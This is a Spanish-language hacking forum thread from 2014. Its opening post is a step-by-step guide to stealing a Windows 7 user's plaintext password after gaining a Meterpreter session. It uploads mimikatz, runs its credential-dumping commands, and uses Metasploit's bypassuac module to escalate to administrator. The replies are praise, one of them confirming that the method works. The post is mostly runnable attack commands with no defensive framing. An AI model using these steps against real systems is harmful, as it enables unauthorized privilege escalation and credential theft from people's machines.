Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: Typh0n en Marzo 05, 2014, 05:52:00 AM

Título: Meterpreter + mimikatz
Publicado por: Typh0n en Marzo 05, 2014, 05:52:00 AM
(http://oi57.tinypic.com/35d5jeh.jpg)

En esta pequeña guía les mostrare como obtener la contraseña de un Windows 7.

Cuando tenemos una sesión con meterpreter y queremos elevar privilegio lo normal es hacer uso de

Código (bash) [Seleccionar]
getsystem o también

Código (bash) [Seleccionar]
hashdump pero este ultimo nos arroja los hashes y desencriptarlo puede ser un problema (tiempo).

Si hicieramos uso de getsystem posiblemente obtengamos este error:

(http://oi57.tinypic.com/23swxaw.jpg)

Esto es porque para poder ejecutar mimikatz con una shell (cmd), necesitamos privilegios, descargamos http://blog.gentilkiwi.com/mimikatz (http://blog.gentilkiwi.com/mimikatz), lo que no interesa es la aplicacion de 32 bits, dentro del directorio Win32

(http://oi61.tinypic.com/2mze981.jpg)

ya que tratandose de un Windows 7 de 32 bits obviamente haremos uso de ello.

subimos mimikatz.exe con el comando upload

(http://oi57.tinypic.com/351wqab.jpg)

lo siguiente es lanzar una shell

Código (bash) [Seleccionar]
shell

y posteriormente ejecutar mimikatz.exe con los comandos propios de la aplicación.

Código (bash) [Seleccionar]

privilege::debug
sekurlsa::logonPasswords full


Nos saldrá este error esto por el tema de privilegios

(http://oi58.tinypic.com/214qaup.jpg)

Para ello haremos uso de este exploit "exploit/windows/local/bypassuac", pero antes tenemos que enviar la sesion a background con el mismo comando.

Código (bash) [Seleccionar]
background

(http://oi59.tinypic.com/2jc6dqc.jpg)

Luego lanzamos el exploit con la sesion del Windows 7 en este caso la primera

Código (bash) [Seleccionar]

use exploit/windows/local/bypassuac
set SESSION 1
exploit


(http://oi60.tinypic.com/69ga44.jpg)

Luego habremos obtenido una segunda sesión con privilegios de administrador, hacemos uso de ella con

Código (bash) [Seleccionar]
sessions -i 2

nos damos cuenta que tenemos maximos privilegios con el comando

Código (bash) [Seleccionar]
getuid

(http://oi61.tinypic.com/2lsk8ar.jpg)

Finalmente lanzamos la shell y ejecutamos mimikatz.exe

(http://oi62.tinypic.com/54ack5.jpg)

Eso es todo Saludos  :)

Título: Re: Meterpreter + mimikatz
Publicado por: ANTRAX en Marzo 05, 2014, 07:57:57 AM
Que buen post bro!!!
Excelente!
Título: Re: Meterpreter + mimikatz
Publicado por: Nuvo en Marzo 06, 2014, 12:07:32 AM
Buenaaas

Muy bien explicado, solo hay que ponerlo a prueba.

Un saludo
Título: Re: Meterpreter + mimikatz
Publicado por: moonshadow en Marzo 06, 2014, 02:30:58 AM
que buen post, me funciono bien
Título: Re: Meterpreter + mimikatz
Publicado por: lejiro en Marzo 06, 2014, 05:31:41 AM
Muy buen aporte, gracias por esta comunidad con material de calidad, lo pruebo y les comento
Título: Re: Meterpreter + mimikatz
Publicado por: CrazyKade en Marzo 06, 2014, 08:53:19 AM
Muy bueno Typh0n!!!!
Felicidades!

CrazyKade